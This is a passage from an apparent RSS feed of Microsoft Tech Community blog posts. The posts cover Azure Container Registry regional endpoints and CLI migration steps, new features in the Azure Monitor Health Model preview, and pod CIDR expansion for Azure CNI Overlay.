&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Private preview&lt;/th&gt;&lt;th&gt;Public preview&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Feature flag registration required (&lt;CODE&gt;az feature register&lt;/CODE&gt;)&lt;/td&gt;&lt;td&gt;No registration needed&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Subscription private preview enrollment and propagation wait&lt;/td&gt;&lt;td&gt;Immediately available to all Azure subscriptions for all Premium SKU registries in all Azure public cloud regions.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Separate CLI extension (&lt;CODE&gt;acrregionalendpoint&lt;/CODE&gt;)&lt;/td&gt;&lt;td&gt;Built into Azure CLI 2.86.0+ natively&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;No registry-level CLI flag&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;az acr update --regional-endpoints enabled&lt;/CODE&gt; enables regional endpoints for all geo-replicas&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt; flag for controlling a geo-replica's global endpoint routing via &lt;CODE&gt;az acr replication update&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Flag for controlling a geo-replica's global endpoint routing renamed to &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;No portal support&lt;/td&gt;&lt;td&gt;Native Azure portal support for enabling regional endpoints for new registries (during creation) and for existing registries&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Private preview docs in &lt;A class="lia-external-url" href="https://github.com/Azure/acr" target="_blank" rel="noopener"&gt;Azure/acr&lt;/A&gt;&lt;/td&gt;&lt;td&gt;Full documentation on &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-geo-replication" target="_blank" rel="noopener"&gt;MS Learn&lt;/A&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H3 id="enabling-regional-endpoints-in-the-azure-portal"&gt;Enabling regional endpoints in the Azure portal&lt;/H3&gt;
&lt;P&gt;You can enable regional endpoints directly from the Azure portal for both new registries (during creation), as well as existing registries:&lt;/P&gt;
&lt;P&gt;&lt;IMG src="https://gist.github.com/user-attachments/assets/ef9532ad-dfdc-47be-892b-dfbc5234f7f0" alt="Enabling regional endpoints in the Azure portal" width="1121" height="761" /&gt;&lt;/P&gt;
&lt;H2 id="if-you-were-in-the-private-preview"&gt;If you were in the private preview&lt;/H2&gt;
&lt;P&gt;&lt;STRONG&gt;1. Uninstall the CLI extension.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;The private preview CLI extension conflicts with the built-in commands in Azure CLI 2.86.0+. Remove it:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az extension remove --name acrregionalendpoint
&lt;/LI-CODE&gt;
&lt;P&gt;Verify it's gone:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az extension list --query "[?name=='acrregionalendpoint']" -o table
&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;2. Ensure you're running Azure CLI 2.86.0 or later.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Regional endpoints commands are available natively starting in Azure CLI 2.86.0. Check your version:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az version
&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;3. Update scripts that use &lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt; for controlling global endpoint routing for a geo-replica.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;The old flag name for controlling a geo-replica's global endpoint routing configuration is deprecated and will be removed in Azure CLI 2.87.0 (June 2026). Update to &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;# Old (deprecated)
az acr replication update --registry myregistry --name westus \
  --region-endpoint-enabled false

# New
az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing false
&lt;/LI-CODE&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Why the rename?&lt;/STRONG&gt; The old flag name &lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt; was confusing — it sounded like it controlled the &lt;EM&gt;regional endpoints&lt;/EM&gt; feature, but it &lt;EM&gt;actually controlled whether a geo-replica participates in global endpoint routing&lt;/EM&gt;. The new name &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt; says exactly what it does. For a full breakdown of all three CLI flags and how they relate, see the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-endpoint-reference" target="_blank" rel="noopener"&gt;endpoint reference&lt;/A&gt;.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 id="learn-more"&gt;Learn more&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Full documentation&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-geo-replication" target="_blank" rel="noopener"&gt;Geo-replication in Azure Container Registry — Regional endpoints&lt;/A&gt; — prerequisites, CLI commands, network considerations, private endpoint integration, and troubleshooting.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Operational deep dive&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://gist.github.com/johnsonshi/0034f8fdc014da64242ffdb8b632709e" target="_blank" rel="noopener"&gt;How ACR geo-replication handles failover, failback, and traffic redirection&lt;/A&gt; — health-aware failover, throttling, eventual consistency, DNS considerations, monitoring, pricing, and a full walkthrough.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Behind-the-scenes engineering implementation&lt;/STRONG&gt;: &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/determinism-over-magic-the-engineering-design-behind-azure-container-registry-re/4524101" target="_blank" rel="noopener" data-lia-auto-title="Determinism over magic: the engineering design behind Azure Container Registry Regional Endpoints" data-lia-auto-title-active="0"&gt;Determinism over magic: the engineering design behind Azure Container Registry Regional Endpoints&lt;/A&gt; — architectural details and the engineering system design behind the feature.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Endpoint reference&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-endpoint-reference" target="_blank" rel="noopener"&gt;Azure Container Registry endpoint reference&lt;/A&gt; — all endpoint types, URL formats, and CLI flags in one place.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Private endpoints&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-private-endpoints" target="_blank" rel="noopener"&gt;Connect privately to a registry using private endpoints&lt;/A&gt; — IP allocation math, subnet sizing, and NIC queries for registries with regional endpoints.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Firewall rules&lt;/STRONG&gt;: &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-firewall-access-rules" target="_blank" rel="noopener"&gt;Configure firewall access rules&lt;/A&gt; — which FQDNs to allow for regional endpoints.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 id="feedback"&gt;Feedback&lt;/H2&gt;
&lt;P&gt;We'd love to hear how you're using regional endpoints and what we can improve. Reach out via:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://github.com/Azure/acr" target="_blank" rel="noopener"&gt;Azure Container Registry GitHub repository&lt;/A&gt; — issues, feature requests, and discussion&lt;/LI&gt;
&lt;LI&gt;Azure portal feedback — use the feedback button in the Azure portal on your registry's page&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Regional endpoints are on the path to GA. Your feedback directly shapes the feature's direction.&lt;/P&gt;</description>
      <pubDate>Fri, 05 Jun 2026 06:12:53 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/regional-endpoints-for-azure-container-registry-geo-replication/ba-p/4525717</guid>
      <dc:creator>johnsonshi_msft</dc:creator>
      <dc:date>2026-06-05T06:12:53Z</dc:date>
    </item>
    <item>
      <title>Azure Monitor Health Model (Preview): What's New!</title>
      <link>https://techcommunity.microsoft.com/t5/azure-observability-blog/azure-monitor-health-model-preview-what-s-new/ba-p/4525707</link>
      <description>&lt;P&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/health-models/overview" target="_blank"&gt;Azure Monitor Health Model&lt;/A&gt; is a modern observability capability that brings together telemetry, architecture, and business context of your workloads to generate health insights. It continuously aggregates signals across dependencies, producing a &lt;STRONG&gt;single, actionable health state&lt;/STRONG&gt; which reduces alert noise and shifts team toward proactive operations with cohesive system view, clearer insights, and faster troubleshooting.&amp;nbsp;&lt;/P&gt;
&lt;P&gt;It addresses the common operation question &lt;STRONG&gt;'Is my system/service/app healthy?'&lt;/STRONG&gt; and &lt;STRONG&gt;'Which underlying unit / component is impacting health?'&lt;/STRONG&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;This refresh introduces flexible, workload-centric discovery (use application insights topology, Azure resource graph queries in addition to designing user and system flows) and smarter, faster health signal creation (use recommended signals, import existing alert rules, set dynamic thresholds).&amp;nbsp;&lt;/P&gt;
&lt;H2&gt;Expanded Discovery Scope&lt;/H2&gt;
&lt;P&gt;As customers began modeling increasingly complex applications, we identified an opportunity to make discovery more flexible and intuitive. Teams naturally reason about their systems differently; some at the application level, others through infrastructure fleets or telemetry views. By expanding discovery options, we enable customers to build health models using the constructs they already use, making it easier to evolve health models as applications and architectures change.&lt;/P&gt;
&lt;P&gt;Azure Monitor health models now support multiple discovery mechanisms:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Application Insights–based discovery &lt;/STRONG&gt;for application-centric modelling&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Azure Resource Graph (ARG) discovery &lt;/STRONG&gt;for scalable, query-based resource selection&lt;/LI&gt;
&lt;LI&gt;Continued support for &lt;STRONG&gt;Service Groups&lt;/STRONG&gt;, now including nested Service Groups, as part of a broader set of discovery options&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This evolution reflects a shift toward loosely coupled modelling, enabling customers to define health based on application architecture rather than infrastructure-centric grouping. &lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/health-models/discoveries?tabs=app-insighttps://learn.microsoft.com/en-us/azure/azure-monitor/health-models/discoveries?tabs=app-insights#discovery-typeshts#discovery-types" target="_blank"&gt;Learn more about Discovery&lt;/A&gt;&lt;/P&gt;
&lt;img&gt;Discovery Rule&lt;/img&gt;
&lt;H2&gt;Extended Health Signals&amp;nbsp;&lt;/H2&gt;
&lt;P&gt;Our goal has been to help customers achieve meaningful health insights faster with less manual effort. By introducing platform defaults and surfacing recommended signals, we make it easier to align health models with proven Azure best practices from day one. At the same time, we preserve support for existing alerting strategies and investments, ensuring customers can extend rather than replace what they already have. These enhancements balance simplicity, guidance, and flexibility as environments scale.&lt;/P&gt;
&lt;P&gt;Health Models now supports the following health signal capabilities:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Resource Health as a default signal&lt;/STRONG&gt;, ensuring every model starts with a reliable platform-provided baseline&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Recommended signals&lt;/STRONG&gt;, automatically surfaced based on Azure service best practices and enhanced through Azure Monitor Baseline Alerts (AMBA) integration&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Reuse of existing signals&lt;/STRONG&gt;, enabled by importing &lt;U&gt;Azure Monitor alert rules&lt;/U&gt; as health signals&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/health-models/signals?tabs=azureresource#add-signal-assignment" target="_blank"&gt;&amp;nbsp;Learn more about Signals&lt;/A&gt;&lt;/P&gt;
&lt;img&gt;Signals - Recommended and Import from Alert Rules for Azure Resources&lt;/img&gt;
&lt;H2&gt;Introducing Health Aggregation Rules&lt;/H2&gt;
&lt;P&gt;Modern cloud applications are built for resiliency, redundancy, and tolerance of partial failure. Health Models are designed to reflect this reality by enabling customers to define what “healthy” means for their architecture. Flexible aggregation rules allow teams to model intent rather than individual component states, producing health views that better align with operational priorities and business impact.&lt;/P&gt;
&lt;P&gt;Health Models now supports advanced aggregation logic, enabling the following types of scenarios:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional resiliency aggregation&lt;/STRONG&gt; using numeric thresholds (e.g., 2 out of 4 regions must remain healthy)&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Cluster and fleet health aggregation&lt;/STRONG&gt; using percentage thresholds (e.g., 60% of VMs in a cluster must be healthy)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This enables modelling resiliency patterns, partial failures, and graceful degradation, providing a more accurate view of real business impact.&lt;/P&gt;
&lt;H2&gt;Import Custom Signal&amp;nbsp;&amp;nbsp;&lt;/H2&gt;
&lt;P&gt;Health is most valuable when it reflects both system behavior and application context. By enabling custom health inputs, customers can incorporate signals that are closest to their business logic and application state. Contextual annotations further enrich analysis, making health timelines easier to interpret and correlate with change events.&lt;/P&gt;
&lt;P&gt;To support this, Health Models now provides for:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Custom health report ingestion&lt;/STRONG&gt; for external application and system health signals&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Data annotations&lt;/STRONG&gt; to overlay deployments, incidents, and configuration changes on health state&amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Alert Experience&amp;nbsp;&lt;/H2&gt;
&lt;P&gt;To proactively learn about health state change, health models allow creating &lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/health-models/alerts" target="_blank"&gt;Alert rules&lt;/A&gt; and associated action group trigger automated responses sich as notifying user. It is now possible to view all the alerts on a Health Model and start troubleshooting.&amp;nbsp; &amp;nbsp;&lt;/P&gt;
&lt;P&gt;Alerts in Health Model Note: To avail these new capabilities, upgrade your health models to the new API version using built-in migration wizard in Azure portal for a simple, guided experience.&lt;/P&gt;
&lt;img&gt;Alerts in Health Model&lt;/img&gt;
&lt;PRE&gt;&lt;STRONG&gt;Note: To avail these new capabilities, upgrade your health models to the new API version using built-in migration wizard in Azure portal for a simple, guided experience.&lt;/STRONG&gt;&lt;/PRE&gt;</description>
      <pubDate>Fri, 05 Jun 2026 01:30:56 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-observability-blog/azure-monitor-health-model-preview-what-s-new/ba-p/4525707</guid>
      <dc:creator>shijain13</dc:creator>
      <dc:date>2026-06-05T01:30:56Z</dc:date>
    </item>
    <item>
      <title>Pod CIDR Expansion Generally Available and IP Address Planning on Azure CNI Overlay</title>
      <link>https://techcommunity.microsoft.com/t5/azure-networking-blog/pod-cidr-expansion-generally-available-and-ip-address-planning/ba-p/4521700</link>
      <description>&lt;div data-video-id="https://youtu.be/XC5MMt4MZqo?si=_4oCc2bbg-Ch4MAN/1779317204448" data-video-remote-vid="https://youtu.be/XC5MMt4MZqo?si=_4oCc2bbg-Ch4MAN/1779317204448" class="lia-video-container lia-media-is-center lia-media-size-large"&gt;&lt;iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fwww.youtube.com%2Fembed%2FXC5MMt4MZqo%3Ffeature%3Doembed&amp;amp;display_name=YouTube&amp;amp;url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DXC5MMt4MZqo&amp;amp;image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FXC5MMt4MZqo%2Fhqdefault.jpg&amp;amp;type=text%2Fhtml&amp;amp;schema=youtube" allowfullscreen="" style="max-width: 100%"&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;P&gt;In networking with Azure CNI Overlay, the cluster-wide pod CIDR is logically partitioned into smaller “node” blocks where each node is assigned a fixed CIDR slice (/24) by Azure. This decouples pod networking from the VNet address space entirely because pods receive addresses from a private CIDR that is separate from the VNet.&lt;/P&gt;
&lt;P&gt;By default, Azure CNI Overlay uses a pod CIDR of 10.244.0.0/16 which provides 65,536 addresses. Since each node consumes 256 addresses from the /24 slice, the default cluster has a node scaling limit of 65,536 divided by 256, or 256 nodes. Choosing a pod CIDR at cluster creation effectively sets an upper bound on how many nodes the cluster can accommodate.&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Pod CIDR&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Per-Node Block&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Max Nodes Supported&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;/16&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;/24&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;256&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;/15&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;/24&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;512&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;/14&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;/24&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;1,024&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H2&gt;What does Pod CIDR Expansion enable?&lt;/H2&gt;
&lt;P&gt;Even with careful upfront planning, long-lived clusters grow in ways that are difficult to anticipate. For organizations using Azure CNI Overlay, this previous represents a difficult migration without meticulous IP planning.&lt;/P&gt;
&lt;P&gt;Pod CIDR expansion allows you to expand the existing CIDR without downtime or node reimaging. Instead of being locked to the range chosen at cluster creation, operators can expand the available pod address space with minimal operational burden.&lt;/P&gt;
&lt;H2&gt;Choosing a Pod CIDR&lt;/H2&gt;
&lt;P&gt;In addition to node scaling limits, there are other considerations for pod CIDR planning:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Overlapping pod CIDRs across clusters – even though pod IPs are not directly routable between clusters, overlapping CIDRs can cause problems with observability tooling or cross-cluster networking on top of the overlay. Careful planning can prevent having to recreate the cluster down the road.&lt;/LI&gt;
&lt;LI&gt;Accounting for system node pools – each system node also consumes a /24 block. IP address planning should factor nodes running cluster control plane components in addition to existing workloads.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Learn More&lt;/H2&gt;
&lt;P&gt;Read more about Azure CNI Overlay:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/aks/concepts-network-azure-cni-overlay" target="_blank" rel="noopener"&gt;Overview of Azure CNI Overlay Networking in Azure Kubernetes Service (AKS)&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Try pod CIDR expansion:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/aks/azure-cni-overlay-pod-expand" target="_blank" rel="noopener"&gt;Expand Pod CIDR Space in Azure CNI Overlay Azure Kubernetes Service (AKS) Clusters&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Fri, 05 Jun 2026 00:14:24 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-networking-blog/pod-cidr-expansion-generally-available-and-ip-address-planning/ba-p/4521700</guid>
      <dc:creator>Sam_Foo</dc:creator>
      <dc:date>2026-06-05T00:14:24Z</dc:date>
    </item>
  </channel>
</rss>

